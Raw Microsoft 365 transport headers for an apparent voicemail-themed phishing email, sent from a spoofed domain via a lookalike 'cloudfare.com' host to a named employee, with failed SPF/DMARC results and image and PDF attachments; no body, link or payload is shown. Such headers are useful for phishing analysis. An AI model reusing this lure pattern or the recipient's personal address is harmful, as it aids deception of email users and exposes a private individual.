                                                                ARC-Message-Signature i=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=Y5V/xx3CJ3ZeC+Yb2J4fKYGaIfNyA44lj4+dHdJz7r8=; b=vbv+x/5vZSDCVV8yiN2Sx7B/nPDi8+XlznHeg2P2WBJDyXezHBpwCOO8Ae2tw8GVOxzKOn3mvdtCj18YLHIcYyU8kCEFr+XbvNiYP2AyW3h2NBy5Sf9WRThytlYdPUPVHiUKKiG+QciHWiiDBgX0wCWsH9a/gHibGCMIp2dDf50grKsNz8XwVAWMayC8NTOojehBMqskqsODZI43S3tQwT0QTbMw1er9ud7FCm3UDlEB6NZg6UAILf1alFL8D52RpeV9Tf4AUie0DeyoPotmnjGgHZFKjjiImuEhBvaPWKBDucDgLWC8zdsoFIbfdTazpnlJ6Wh0ATGTjC71vV2pdg==
                                                                ARC-Authentication-Results i=1; mx.microsoft.com 1; spf=fail (sender ip is 173.195.100.199) smtp.rcpttodomain=montrose-env.com smtp.mailfrom=generous-minds.com; dmarc=fail (p=none sp=none pct=100) action=none header.from=generous-minds.com; dkim=none (message not signed); arc=none (0)
                                                                Received from cloudfare.com (173.195.100.199) by DU6PEPF0000B621.mail.protection.outlook.com (10.167.8.138) with Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8158.14 via Frontend Transport; Fri, 15 Nov 2024 18:28:20 +0000
                                                                Authentication-Results spf=pass (sender IP is 40.107.247.116) smtp.mailfrom=generous-minds.com; dkim=pass (signature was verified) header.d=generousminds.onmicrosoft.com;dmarc=pass action=none header.from=generous-minds.com;compauth=pass reason=100
                                                                Received-SPF Fail (protection.outlook.com: domain of generous-minds.com does not designate 173.195.100.199 as permitted sender) receiver=protection.outlook.com; client-ip=173.195.100.199; helo=cloudfare.com;
                                                                DKIM-Signature v=1; a=rsa-sha256; c=relaxed/relaxed; d=generousminds.onmicrosoft.com; s=selector2-generousminds-onmicrosoft-com; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck; bh=Y5V/xx3CJ3ZeC+Yb2J4fKYGaIfNyA44lj4+dHdJz7r8=; b=tTpqZ0r+yE9jZ7xccQ5ibSJD8YX6FXtQjb619+4iurrw+TgBN+dnivlDkvCwtGx3lm3L7sr23W1HQKr+oEtkWpEMayc1eIIcxe6RLPifVH1Cio4YHHXUt0nBspAsf6H7enWk318G/Cf8/V/q0hlMH6oAwfjkqf3BZRZnh5OF2mU=
                                                                X-MS-Exchange-Authentication-Results spf=fail (sender IP is 173.195.100.199) smtp.mailfrom=generous-minds.com; dkim=none (message not signed) header.d=none;dmarc=fail action=none header.from=generous-minds.com;
                                                                From "Audio.calls" <rbeuk@generous-minds.com>
                                                                Subject [External] - MONTROSE-ENV: You have a Voice Mail (if)
                                                                To kelly.swanson@montrose-env.com
                                                                Content-Type multipart/mixed; boundary="_19228eef-c57b-4190-9c5a-8b946159626b_"
                                                                MIME-Version 1.0
                                                                Date Fri, 15 Nov 2024 17:21:09 -0800
                                                                Message-ID <1509202411211767EE169487-4AE9380373@generous-minds.com>
                                                                X-Mailer Outlook Express 6.00.2900.2527
                                                                Return-Path rbeuk@generous-minds.com
                                                                X-EOPAttributedMessage 1
                                                                X-MS-TrafficTypeDiagnostic DU6PEPF0000B621:EE_|PA4PR08MB5952:EE_|SA2PEPF00002251:EE_|SJ0PR09MB11746:EE_
                                                                X-MS-Office365-Filtering-Correlation-Id fc02e381-59d2-4bbd-595d-08dd05a35233
                                                                X-MS-Exchange-SenderADCheck 1
                                                                X-MS-Exchange-AntiSpam-Relay 0
                                                                X-Microsoft-Antispam-Untrusted BCL:0; ARA:13230040|376014|82310400026|1800799024|36860700013|34020700016|4076899003|8096899003;
X-Forefront-Antispam-Report-Untrusted: CIP:173.195.100.199; CTRY:US; LANG:en; SCL:1; SRV:; IPV:NLI; SFV:NSPM; H:cloudfare.com; PTR:InfoDomainNonexistent; CAT:NONE; SFS:(13230040)(376014)(82310400026)(1800799024)(36860700013)(34020700016)(4076899003)(8096899003); DIR:OUT; SFP:1102;
X-MS-Exchange-Transport-CrossTenantHeadersStamped: PA4PR08MB5952
X-MS-Exchange-Organization-OriginalArrivalTime: 15 Nov 2024 18:28:37.0727 (UTC)
X-MS-Exchange-Organization-ExpirationStartTime: 15 Nov 2024 18:28:37.3383 (UTC)
X-MS-Exchange-Organization-ExpirationStartTimeReason: OriginalSubmit
X-MS-Exchange-Organization-ExpirationInterval: 1:00:00:00.0000000
X-MS-Exchange-Organization-ExpirationIntervalReason: OriginalSubmit
X-MS-Exchange-Organization-Network-Message-Id: fc02e381-59d2-4bbd-595d-08dd05a35233
X-MS-Exchange-Organization-OriginalClientIPAddress: 40.107.247.116
X-MS-Exchange-Organization-OriginalServerIPAddress: 10.167.242.133
X-EOPTenantAttributedMessage: 726003d6-df89-4f29-896a-515cf07df7dc:0
X-MS-Exchange-Organization-TargetResourceForest: namprd09.prod.outlook.com
X-MS-Exchange-Organization-OrgEopForest: GCC02
X-MS-Exchange-Organization-MessageDirectionality: Incoming
X-MS-Exchange-Organization-Id: 726003d6-df89-4f29-896a-515cf07df7dc
X-MS-Exchange-Organization-FFO-ServiceTag: GCC02B
X-MS-Exchange-Organization-TenantServiceProvider: FOPE
X-MS-Exchange-Organization-Cross-Premises-Headers-Processed: SA2PEPF00002251.namprd09.prod.outlook.com
X-MS-Exchange-Organization-OriginalTenant-OriginalArrivalTime: 15 Nov 2024 18:28:20.6196 (UTC)
X-MS-Exchange-Organization-OriginalTenant-Network-Message-Id: 2a2328df-bdc3-4a84-7f0c-08dd05a34875
X-MS-Exchange-Organization-OriginalTenant-Id: 3672ec2f-700d-42a5-8329-71f66235757e
X-MS-Exchange-Organization-OriginalAttributedTenantConnectingIp: TenantId=3672ec2f-700d-42a5-8329-71f66235757e; Ip=[173.195.100.199]; Helo=[cloudfare.com]
X-MS-Exchange-Organization-OriginalTenant-AuthSource: DU6PEPF0000B621.eurprd02.prod.outlook.com
X-MS-Exchange-Organization-OriginalTenant-AuthAs: Anonymous
X-MS-Exchange-Organization-OriginalTenant-FromEntityHeader: HybridOnPrem
X-MS-Exchange-Transport-CrossTenantHeadersStripped: SA2PEPF00002251.namprd09.prod.outlook.com
X-MS-Exchange-Transport-CrossTenantHeadersPromoted: SA2PEPF00002251.namprd09.prod.outlook.com
X-MS-Exchange-Organization-ConnectingIP: 40.107.247.116
X-MS-Exchange-Organization-ConnectingEHLO: EUR02-AM0-obe.outbound.protection.outlook.com
X-MS-Exchange-Organization-AS-LastExternalIp: 40.107.247.116
X-MS-Exchange-Organization-IsBipIncludedAtpTenant: true
X-MS-Exchange-Organization-IsAtpTenant: true
X-MS-Exchange-Organization-AntiSpam-ArcTrustedDomains: checkpointcloudsec.com
X-MS-Exchange-Organization-Originating-Country: NL
X-MS-Exchange-Organization-OriginalEnvelopeRecipients: kelly.swanson@montrose-env.com
X-MS-Exchange-Organization-PtrDomains: mail-am0eur02on2116.outbound.protection.outlook.com
X-MS-Exchange-Organization-EhloAndPtrDomain: EUR02-AM0-obe.outbound.protection.outlook.com; mail-am0eur02on2116.outbound.protection.outlook.com
X-MS-Exchange-Organization-MxPointsToUs: true
X-MS-Exchange-Organization-RecipientDomainMxRecord-PFAFD: montrose-env.com#montroseenv-com02b.mail.protection.outlook.com
X-MS-Exchange-Organization-RecipientDomainMxInfo: montrose-env.com#Office365#montroseenv-com02b.mail.protection.outlook.com
X-MS-Exchange-Organization-CompAuthRes: pass
X-MS-Exchange-Organization-CompAuthReason: 100
X-MS-Exchange-Organization-SpoofDetection-Frontdoor-DisplayDomainName: generous-minds.com
X-MS-Exchange-Organization-SenderRep-Score: 5
X-MS-Exchange-Organization-SenderRep-Data: IpClassLargeGrayOther_GrayOther_SmallGrayOther
X-MS-Exchange-Organization-VBR-Class: GrayOther
X-MS-Exchange-Organization-HMATPModel-Spf: 1
X-MS-Exchange-Organization-HMATPModel-Recipient: <PII:H100055(Zau5Zpy6qEWbUrJisQKW+Ajm7drlik0oN1OxhvuYO2g=)>@montrose-env.com
X-MS-Exchange-Organization-TransportTrafficType: Email
X-MS-Exchange-Organization-TransportTrafficSubType:
X-MS-PublicTrafficType: Email
X-MS-Exchange-Organization-OrderedPrecisionLatencyInProgress: LSRV=BL0PR0901CA0028.namprd09.prod.outlook.com:TOTAL-FE=0.216|SMR-PEN=0.216(RENV=0.214); 2024-11-15T18:28:37.645Z
X-MS-Exchange-Organization-MessageLatency: SRV=BL0PR0901CA0028.namprd09.prod.outlook.com:TOTAL-FE=0.425|SMR-PEN=0.425(RENV=0.214|SMRPROXY-PEN=0.209(SMSC=0.136|SMS-PEN=0.073))
X-MS-Exchange-Forest-ArrivalHubServer: SJ0PR09MB11746.namprd09.prod.outlook.com
X-MS-Exchange-Organization-AuthSource: SA2PEPF00002251.namprd09.prod.outlook.com
X-MS-Exchange-Organization-AuthAs: Anonymous
X-MS-Exchange-Organization-FromEntityHeader: Internet
X-MS-Exchange-Organization-MessageScope: cfa23dee-c63e-4018-a908-33fd0686894c
X-MS-Exchange-Forest-MessageScope: cfa23dee-c63e-4018-a908-33fd0686894c
X-MS-Exchange-Organization-Antispam-ProtocolFilterHub-ScanContext: ProtocolFilterHub:SmtpOnEndOfData;
X-MS-Office365-Filtering-Correlation-Id-Prvs: 2a2328df-bdc3-4a84-7f0c-08dd05a34875
                                                                X-MS-Exchange-Organization-P2SenderDisplayNamePIIH100055(g0rqra/nkf8Kd2tpjMppDdG+n3CJOpHCR2fptHV5FxA=)
                                                                X-MS-Exchange-Organization-P2SenderPII<PII:H100055(FlWml3KlDCf/DyULONqE+txwmt7WItOAY7cR5BERycg=)>@generous-minds.com
X-MS-Exchange-Organization-Auth-DmarcStatus: Pass
X-MS-Exchange-Organization-VerifiedDkimDomainsList: generousminds.onmicrosoft.com
X-MS-Exchange-Organization-Antispam-AuthResults: {"SpfDomain":"generous-minds.com", "SpfAuthStatus":"Pass", "DkimDomain":"generousminds.onmicrosoft.com", "DkimAuthStatus":"Pass", "DkimSubStatus":"None", "DmarcAuthStatus":"Pass", "DmarcAction":"None", "ArcAuthStatus":"2", "ArcSubStatus":"0"}
X-MS-Exchange-Organization-PFAHub-Total-Message-Size: 143210
X-MS-Exchange-Organization-OriginalSize: 143210
X-MS-Exchange-Organization-HygienePolicy: Premium
X-MS-Exchange-Organization-ReplicationInfo: ReplicaId=c5b5dc19-460f-44c3-1045-7b52a305dd08; ReplicatingServerFqdn=PH0PR09MB11757.namprd09.prod.outlook.com
X-MS-Exchange-Organization-PhishSim-Rules-Execution-History: 225c5842-f453-4d69-93d1-5592be3f6e44
X-MS-Exchange-Organization-Antispam-PreContentFilter-PolicyLoadTime: PSOSUB:151; PSOSUBLOAD:148; PSOSUBRUN:1; PSOSUBCOUNT:1; SMORES:71; SMORESLOAD:69; SMORESRUN:0; SMORESCOUNT:0; SAORES:147; SAORESLOAD:72; SAORESRUN:0; SAORESCOUNT:1; SLORES:76; APORES:146; APORESLOAD:73; RSORES:73; SLORESLOAD:72; SLORESRUN:0; SLORESCOUNT:1;
X-MS-Exchange-Organization-MessageFingerprint: D5DDD02C.C22ADC8.ADCB3E2.C0EBC0AB.201F4
X-MS-Exchange-Organization-ExtractedBarcode:
X-MS-Exchange-Organization-AttachmentDetailsInfo-ChunkCount: 1
X-MS-Exchange-Organization-AttachmentDetailsInfo-0: [{"ID":0, "FS":82368, "SHA256":"344938f2e50ce50316a1400fd8965085dd859889721d47756645e6ca532e895d", "HFH":"NEk48uUM5QMWoUAP2JZQhd2FmIlyHUd1ZkXmylMuiV0=", "FE":"png", "AF":2048, "AFT":"{784:\"jeminiqw2.png\", 789:\"png\"}", "AFT2":"{784:\"jeminiqw2.png\", 789:\"png\", 2919:1120, 2920:540, 2921:32, 2923:1, 2934:\"png\"}", "FPR":{"IF0":"IF0_00FF05FFF1182F1007FFFF1A7FFBBA007FFFF55"}}, {"ID":1, "FS":0, "FE":"", "AF":0, "AFT":"{784:\"ilil.pdf\"}", "AFT2":"{784:\"ilil.pdf\", 3147:1}"}]
X-MS-Exchange-Organization-URLFeatureReduction: 17; 2; 0; 13; 0; 0; 0; 0; 9; 2; 1; 89; 0; 0; 0; 1; 0; 0
X-MS-Exchange-Organization-Persisted-Urls-ChunkCount: 5
X-MS-Exchange-Organization-PersistedUrlCount: 2
X-MS-Exchange-Organization-Antispam-PreContentFilter-ScanContext: CategorizerOnSubmitted; CategorizerOnResolved;
X-MS-Exchange-Organization-AVScannedByV2: true
X-MS-Exchange-Organization-AVScanComplete: true
X-MS-Exchange-Organization-UrlSelected: 1
X-MS-Exchange-Organization-UrlLogged: 1
X-MS-Exchange-Organization-OffboxClassificationInfo: {"EndpointId":"DCS", "OperationIds":{}, "OperationStates":{}, "Classifiers":[], "RuleInfos":[], "CorrelationId":"13002a4f-0ad5-4fed-a0e0-bd98f435a70c", "TotalClassificationLatency":"00:00:00"}
X-MS-Exchange-Organization-ExternalRoutingTopologyAnalysis:
X-MS-Exchange-Organization-Recipient-Limit-Verified: True
X-MS-Exchange-Organization-TotalRecipientCount: 1
X-MS-Exchange-Organization-ExternalRecipientCount: 0
X-MS-Exchange-Organization-IsSingleRepresentative: True
X-MS-Exchange-Organization-ASDirectionalityType: 1
X-MS-Exchange-Organization-HVERecipientsForked: 1.0
X-MS-Exchange-Organization-SafeAttachmentPolicy: Montrose Environmental Group_SafeAttachments
X-MS-Exchange-Organization-SafeLinksPolicy: Montrose Environmental Group_SafeLinks
X-MS-Exchange-Organization-SafeAttachmentPolicy-Enable: 1
X-MS-Exchange-Organization-SafeLinksPolicy-EnableSafeLinksForEmail: 1
X-MS-Exchange-Organization-SafeLinksPolicy-EnableSafeLinksForInternalSenders: 1
X-MS-Exchange-Organization-SenderRecipientCommunicationState: NEI
X-MS-Exchange-Organization-Boomerang-Verdict: None
X-MS-Exchange-AtpMessageProperties: SA|SL
X-MS-Exchange-Organization-CommunicationStateSummary: NEI
X-MS-Exchange-Organization-FirstContactSummary: ST=2; MRG=0; EXT=0; UN=1; ORCT=1; EV=1; FC=0; NESI=1; NES=0; ESTI=0; EST=0; INS=0; MP=0; UD=0; QE=0; ERR=0
X-MS-Exchange-Organization-SenderIntelligence-P2SenderOrgDomainTenantId: {"stringProperties":{"_STATUS":"Success"}, "numericProperties":{"EntityFound":1}}
X-MS-Exchange-Organization-Antispam-AnalystFeatureFilter-ScanContext: CategorizerOnResolved;
X-MS-Exchange-Organization-Disclaimer-Hash: 701c2b241f95b3174788fda1995bba19225f4fc03a97f7214d64c495fd69afd6
X-MS-Exchange-Organization-Rules-Execution-Log: a11f404c-6206-4380-b021-16ffcfcdfb9b
X-MS-Exchange-Organization-RuleName-Execution-Log: TGVnYWwgRGlzY2xhaW1lcg==
X-MS-Exchange-Forest-RulesExecuted: SJ0PR09MB11746
X-MS-Exchange-Organization-RulesExecuted: SJ0PR09MB11746
X-MS-Exchange-Organization-DlpRulesExecuted: SJ0PR09MB11746
X-MS-Exchange-Organization-Antispam-ContentFilter-ScanContext: CategorizerOnResolved;
X-MS-Exchange-Organization-CFA-UserOption: 0
X-MS-Exchange-Organization-CompAuth: compauth=pass reason=100
X-MS-Exchange-Organization-ContainsAttachments: true
X-MS-Exchange-Organization-ExtractionTagsSubject: [External] - MONTROSE-ENV: You have a Voice Mail (if)
X-MS-Exchange-Organization-ExtractionTagsFrom: "Audio.calls" <rbeuk@generous-minds.com>
X-MS-Exchange-Organization-ExtractionTagsSubjectNormalized: external rnontrose env you have a volce rnall lf
                                                                X-MS-Exchange-Organization-ExtractionTags1IMG;SUB64;
                                                                X-MS-Exchange-Organization-ExtractionTagsURLFoundURL
X-MS-Exchange-Organization-ATPDetonationContext: Email_EnterpriseATP_Mailflow
X-MS-Exchange-Organization-Antispam-SpamFilter-ScanContext: CategorizerOnResolved;
X-MS-Exchange-Organization-Antispam-AnalystRuleHits: (13230040)(4073199012)(35042699022)(12062699021)(22003199012)(5073199012)(5063199012)(4076899003)(8096899003)
X-MS-Exchange-Organization-Antispam-ScanContext: DIR:Incoming; SFV:NSPM; SKIP:0;
X-MS-Exchange-Organization-Antispam-PostContentFilter-ScanContext: CategorizerOnResolved; CategorizerOnRouted;
X-MS-Exchange-Organization-SCL: 1
X-Microsoft-Antispam: BCL:0; ARA:13230040|4073199012|35042699022|12062699021|22003199012|5073199012|5063199012|4076899003|8096899003;
X-MS-Exchange-Organization-EmailFingerprintsDetailsInfo-ChunkCount: 1
                                                                X-MS-Exchange-Organization-EmailFingerprintsDetailsInfo-0[{"Type":"VA5", "Val":"VA5_35679BBB759096F6ADD50C075CDA94742C0BEBA0C422CCEF7EDFEA0F7D8EACA1", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA4", "Val":"VA4_32098211BEC4F3412D61AD134799A15CB09DBEB2C9305F982C8C21F5530B112E", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA33", "Val":"VA33_AF95782C2AC71E270B4B43D39DA81BA9AF00CC37ABB5DA2101F239A1FFA26551", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA32", "Val":"VA32_CF3BD79EED1636B8ACDA4B58E1D7417E62D22348C94A721E14081AC262236068", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA31", "Val":"VA31_8058BE99423A5EE9C92979FE2D1ED90CC62F1C83649BBB9BC4B063830B629CC1", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA30", "Val":"VA30_1F5639DAFCF8E35E7F687591A1A386957FF77AB6FCD4D0822562711B3E07053E", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA11", "Val":"VA11_BF700B5CA432B5291DDA5E8D07F071C5F43A75A97983C7DCEF934E20D6507461", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA10", "Val":"VA10_B334A70E22C2F7B899AECFBC6B1932FDFB8161B37119D8E0D00E37B418CFED3B", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA61", "Val":"VA61_4B7261ED3058F0FB9947B38E8A3315AED561A7DCA432E2AF700941BF5A497B5A", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA60", "Val":"VA60_1B464C25833D382637CEB0490087E2CA7E216D2E9F178C57767EFE9D5BB8B4AD", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA3", "Val":"VA3_ECDDD03C.C32ADC8.EDCB32E.C4EB922A.32BE2111", "Func":"None", "FF":0, "PD":{}}, {"Type":"VA2", "Val":"VA2_34E3A4EA98750E7AF3212B7E959904BCB40252464F251D84A973CEA012AA772B", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA1", "Val":"VA1_269D4CDD7A97F04CCE851A2058C64BB311746EE00D0A83A7C2A9B8BC7E2946ED", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA0", "Val":"VA0_7C47C2F5F27A2BEF4904A08748E73F4D01FDF78F4F7D0E6EA48D45613C4D1C20", "Func":"SHA256", "FF":0, "PD":{}}]
                                                                X-Microsoft-Antispam-Message-Info
                                                                X-Forefront-Antispam-ReportCIP:40.107.247.116; CTRY:NL; LANG:en; SCL:1; SRV:; IPV:NLI; SFV:NSPM; H:EUR02-AM0-obe.outbound.protection.outlook.com; PTR:mail-am0eur02on2116.outbound.protection.outlook.com; CAT:NONE; SFTY:9.25; SFS:(13230040)(4073199012)(35042699022)(12062699021)(22003199012)(5073199012)(5063199012)(4076899003)(8096899003); DIR:INB; SFTY:9.25;
                                                                X-MS-Exchange-Organization-GroupForkPerfVCL=0;VL=0
                                                                X-MS-Exchange-Forest-Languageen
                                                                X-MS-Exchange-Forest-IndexAgent-0
                                                                X-MS-Exchange-Forest-IndexAgent1 1893
                                                                X-MS-Exchange-Forest-EmailMessageHash68D071B1,2043FC0C,00000000
                                                                X-MS-Exchange-Organization-RoutingMessageBlockingAgent-Checkedtrue
                                                                X-MS-Exchange-Organization-FeatureTableV2{255:11, 256:11, 261:10, 262:10, 341:3, 342:0, 343:1, 344:0, 345:1, 346:0, 347:3, 348:0, 349:1, 350:0, 351:1, 352:0, 353:14, 354:7, 355:13, 356:6, 357:33, 358:8, 382:"173.195.100.199", 383:"cloudfare.com", 384:"generous-minds.com", 385:"generous-minds.com", 386:"True", 387:"True", 421:48, 422:0, 423:48, 424:0, 425:75, 426:7, 427:75, 428:7, 429:89, 430:7, 452:1, 453:1, 454:"40FCF4D@montrose-env.com", 455:"NEI", 457:429, 458:63, 459:217, 460:1671277, 461:209, 462:1231801, 463:209, 464:1231801, 501:1, 502:1, 503:1, 504:1, 506:1, 507:1, 508:"generousminds.onmicrosoft.com", 509:"generous-minds.com", 510:"generous-minds.com", 511:"pass", 512:100, 603:0, 604:0, 651:2, 653:1, 668:0, 669:15, 723:1, 738:1, 739:1, 740:1, 741:1, 742:3, 743:7, 744:1, 749:"Latn", 756:0, 757:0, 758:"ECDDD03C.C32ADC8.EDCB32E.C4EB922A.201AB",824:17,825:2,827:13,832:9,833:2,834:1,844:1,845:0,848:"20101999007",951:36,952:1623,954:2684,964:92,965:51,966:546,967:37,968:2830,973:20,1010:0,1011:"EDAFD3BE; ",1028:5844,1029:5502,1030:23,1031:341,1032:5844,1033:5502,1034:23,1035:341,1036:"8075",1051:-1,1052:-1,1053:-1,1054:-1,1229:"1",1230:"0",1231:"SectionFuzzyEqual",1232:"Voice",1401:0,1402:0,1403:0,1404:0,1405:0,1406:0,1407:845,1408:901,1409:2598,1410:2676,1411:2598,1412:2676,1413:8,1414:6621897,1417:9,1418:430146155,1423:24,1424:23615729263,2501:0,2502:0,2503:0,2504:0,2505:0,2506:0,2507:0,2508:0,2509:0,2510:0,2511:0,2512:0,2513:0,2514:0,2515:0,2516:0,2517:0,2518:0,2519:0,2520:0,2521:0,2522:0,2523:0,2524:0,2525:0,2526:0,2527:0,2528:0, 2529:0, 2530:0, 2531:0, 2532:0, 2533:0, 2534:0, 2535:0, 2536:0, 2537:0, 2538:0, 2539:0, 2683:555, 2684:446, 2685:538, 2686:446, 2687:538, 2747:-24748, 2753:1, 2760:1, 2769:0, 2770:0, 2771:0, 2772:15, 2773:429, 2774:255, 2775:7, 2776:90, 2777:255, 2778:7, 2779:90, 2780:1005415, 2781:1005415, 2782:0, 2783:16, 2784:271, 2785:8, 2786:109, 2787:1339222, 2788:63, 2801:8, 
2802:35, 2803:44, 2804:15679077391, 2805:15, 2806:8, 2807:15, 2808:7, 2809:18, 2810:248354939, 2811:20, 2812:3728208, 2813:0, 2814:0, 2815:0, 2816:0, 2817:0, 2818:0, 2819:0, 2820:1275, 2821:1275, 2822:0, 2823:0, 2824:395, 2825:0, 2830:0, 2831:0, 2832:0, 2833:0, 2834:0, 2835:0, 2836:1353, 2837:1353, 2842:0, 2843:0, 2844:451, 2909:10, 2910:10, 2911:11, 2912:11, 2913:-1, 2914:-1, 2915:-1, 2916:-1, 2917:-1, 2918:-1, 2924:"CorrectlyConfigured",3083:"3.99",3084:"3.11",3086:124,3088:14,3089:385,3096:"3.99",3099:2,3100:13,3101:1,3102:5,3118:"div:7; p:70; a:6; img:1; br:9; b:21; html:1; head:1; meta:3; style:1; body:1; o_p:44; span:41; strong:1",3120:1,3121:1,3124:"0.241",3145:"centene.com",3148:"account"}
                                                                X-MS-Exchange-Organization-ATPSafeLinks-MsgData{"IsUrlBeingScanned":"", "UrlWriteTime":"11/15/2024 6:28:42 PM","ASDirectionality":"1","PhishEdu":"0","MsgScanSuspicionLevel":"0"}
                                                                X-MS-Exchange-Organization-Antispam-SafelinksWrappingInMDFATrue
                                                                X-MS-Exchange-Organization-Cross-Session-Cache03Ptl2FprThreshold=; SRESV_Ptl3FprThreshold=; SRESV_Ptl4FprThreshold=; BKEMB_ModelName=; BKEMB_VerdictVersion=; BKEMB_P2BCLFprThreshold=; BKEMB_NonP2BCLFprThreshold=; BKEMS_FprThreshold=; CLEPV_ModelName=; CLEPV_VerdictVersion=; CLEPV_HCPhishFprThreshold=; CLEPV_LCPhishFprThreshold=; SAEPV_ModelName=; SAEPV_VerdictVersion=; SUEPV_ModelName=SUEPV; SUEPV_VerdictVersion=; UESELV3_ModelName=; UESELV3_VerdictVersion=; BMCSV_ModelName=; BMCSV_VerdictVersion=; BMCSV_FprThreshold=; BKCMB_ModelName=; BKCMB_VerdictVersion=; BKCMB_FprThreshold=; BKCMS_FprThreshold=; SPCPV_ModelName=; SPCPV_VerdictVersion=; SPCPV_FprThreshold=; M3CSV_ModelName=; M3CSV_VerdictVersion=; M3CSV_FprThreshold=; M3CSV_FC_FprThreshold=; SRCSV_ModelName=SDRCB; SRCSV_VerdictVersion=2; UCSELV3_ModelName=; UCSELV3_VerdictVersion=; BMHPV_ModelName=; BMHPV_VerdictVersion=; BMHPV_Ptl1FprThreshold=; BMHPV_Ptl2FprThreshold=; BMHPV_Ptl3FprThreshold=; BMHPV_Ptl4FprThreshold=; M3HPV_ModelName=; M3HPV_VerdictVersion=; M3HPV_Ptl1FprThreshold=; M3HPV_Ptl2FprThreshold=; M3HPV_Ptl3FprThreshold=; M3HPV_Ptl4FprThreshold=; M3HSV_ModelName=; M3HSV_VerdictVersion=; M3HSV_Ptl1FprThreshold=; M3HSV_Ptl1FprThreshold_FC=; M3HSV_Ptl2FprThreshold=; M3HSV_Ptl2FprThreshold_FC=; M3HSV_Ptl3FprThreshold=; M3HSV_Ptl3FprThreshold_FC=; M3HSV_Ptl4FprThreshold=; M3HSV_Ptl4FprThreshold_FC=; BMEPV_ModelName=BPMV3; BMEPV_VerdictVersion=1; BMEPV_Ptl1FprThreshold=12; BMEPV_Ptl2FprThreshold=11; BMEPV_Ptl3FprThreshold=11; BMEPV_Ptl4FprThreshold=9; SRCSV_FprThreshold=240; CrossModelsConfigDestination=; CLEPV_FP=8; CLEPV=8; M3EPV_FP=51; M3EPV=51; M3ESV_FP=546; M3ESV=546; M3EIV_FP=92; M3HPV_FP=37; M3HPV=37; M3HSV_FP=2451; BMESV_FP=2684; BMESV=2684; BMHPV_FP=36; BMHPV=36; BKEMB_FP=-2; BKEMS_FP=10000; SUEPV_FP=521; SAEPV_FP=294; ATCHF_DBG=SKPD:11; FSC=15; FSCID=9301044456; ASC=0; FFV=NSPM; FFV_CL=1; FV=NSPM; FVS=Filters; FSCL=1; TAP_EP=; 
SFTY_FS=FC;SFTY=9.25;TIP_CULTURE=en-US
                                                                X-MS-Exchange-Organization-Processed-By-Gcc-JournalingJournal Agent
                                                                customermontrose

                                                                Icon Hash:46070c0a8e0c67d6